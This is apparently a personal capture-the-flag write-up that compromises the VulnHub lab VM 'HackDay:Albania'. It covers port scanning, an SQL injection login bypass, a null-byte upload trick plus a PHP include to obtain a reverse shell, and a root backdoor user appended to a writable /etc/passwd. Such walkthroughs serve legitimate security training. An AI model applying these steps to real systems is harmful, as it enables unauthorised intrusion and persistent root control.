Lets do this, so we have this VM from VulnHub called HackDay:Albania which is a pretty awesome vm,
and it was quite a fight to pwn this box.
so after doing
we got the following ip address as a target 192.168.1.13
so now scan all the available ports on the target
nmap -v -sV -p- 192.168.1.13
which gives us the following output :
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
so now we know that SSH is open and they also seem to have changed the port to the webserver to port 8008 sneaky hehe.
So lets see what is on the website, we see there is a background of mr robot, and a popup message which is being, translated to “Welcome, If I am, I know where to go;)” so i thought that would be a reference to robots.txt even if it wasnt there, its the first thing that i check when i encounter a webapplication.
output : Disallow: /rkfpuzrahngvat/ Disallow: /slgqvasbiohwbu/ Disallow: /tmhrwbtcjpixcv/ Disallow: /vojtydvelrkzex/ Disallow: /wpkuzewfmslafy/ Disallow: /xqlvafxgntmbgz/ Disallow: /yrmwbgyhouncha/ Disallow: /zsnxchzipvodib/ Disallow: /atoydiajqwpejc/ Disallow: /bupzejbkrxqfkd/ Disallow: /cvqafkclsyrgle/ Disallow: /unisxcudkqjydw/ Disallow: /dwrbgldmtzshmf/ Disallow: /exschmenuating/ Disallow: /fytdinfovbujoh/ Disallow: /gzuejogpwcvkpi/ Disallow: /havfkphqxdwlqj/ Disallow: /ibwglqiryexmrk/ Disallow: /jcxhmrjszfynsl/ Disallow: /kdyinsktagzotm/ Disallow: /lezjotlubhapun/ Disallow: /mfakpumvcibqvo/ Disallow: /ngblqvnwdjcrwp/ Disallow: /ohcmrwoxekdsxq/ Disallow: /pidnsxpyfletyr/ Disallow: /qjeotyqzgmfuzs/
after checking a few of them, and getting trolled with an image from a dinosaur(Philosoraptor)
this will give us a different message
http://192.168.1.13:8008/unisxcudkqjydw IS there any /vulnbank/ in there ???
alright so we have a hint there might be a folder called /vulnbank/ in here
so we traverse to this folder and yup, it has a directory listing vulnerability showing us a client folder,
and when we click on the folder named client, we get the bank website.
lets pwn the bank
on the bank website we see there is a username and password form, so lets see if the username form is vulnerable to sql injection
so lets type in ‘ in the username form
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102
so at first i tried to use sqlmap, and then dump the database, however this was not working since i couldnt retrieve any DBMS names
so then i tried to bypass the login form with ‘# to comment out the rest, it didnt returned an error message so we need a user now
lets intercept the request and send that to burp suite intruder,
after bruting the username with burpsuite this is the final payload to bypass the login form
bypassing the ticket system
awesome we bypassed the login, now lets see if we can loot this bank haha.
we can see there is a ticket upload system on the right side of the app, I am pretty sure we need to upload a shell, by using the file upload, within the ticket system
first i tried uploading a normal .php file and we got the following error :
After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...
ok so we need to bypass this protection, lets try uploading a php file with .php%00.jpg the old nullbyte trick
and the file is successfully uploaded, lets try to view it by dragging the broken image icon to the url bar
and we get the following error
Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13
we get an include error so apparently there is a include function into the php code, so we can just upload a jpeg, with phpcode embedded into it, and then it will execute the php code in the image, and return a shell to us
i used a pentestmonkey php reverse shell, but also tried it with a msfvenom meterpreter reverse_tcp and that worked aswell, so now just setup a nc listener and catch your shell
nc -lvp 4444
no we can go back to our ticket, and view the file and we receive the shell ^_^
note : that if you want to catch a meterpreter shell you need to setup a multi/handler first.
now we have the shell, we can try to get a TTY shell with python, however in this case python was not installed, so i used this
script /dev/null -c bash
voila now we have a TTY Shell
now we need to see how to get root on the box, first i checked the /home folder but there was only a single user there nothing interesting
lets see if we have any writeable files, we can write to
find / -writable -type f 2>/dev/null
we can see we have /etc/passwd, so if we add a user there with root privileges we should have root, so we copy the passwd file to our box,lets make a hashed password by using
openssl passwd -1 Password: Verifying - Password: $1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv
test is the password
lets save the file and encode it in base64 so we can paste it over, note : dont forget the -w 0 otherwise you have problems to paste it over
cat passwd | base64 -w 0
now lets copy the base64 encoded string, pipe it then decode it and replace that with the passwd file on the target
echo "b64stringhere" | base64 -d >> /etc/passwd
now lets see if the /etc/passwd file got changed, by our user
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:108:112::/var/run/dbus:/bin/false uuidd:x:109:113::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash
now we can login as the new user we created by doing
and we got root to the b0x YEAH! ^_^
so all we have to do now is cat the flag
thanks for reading my writeup.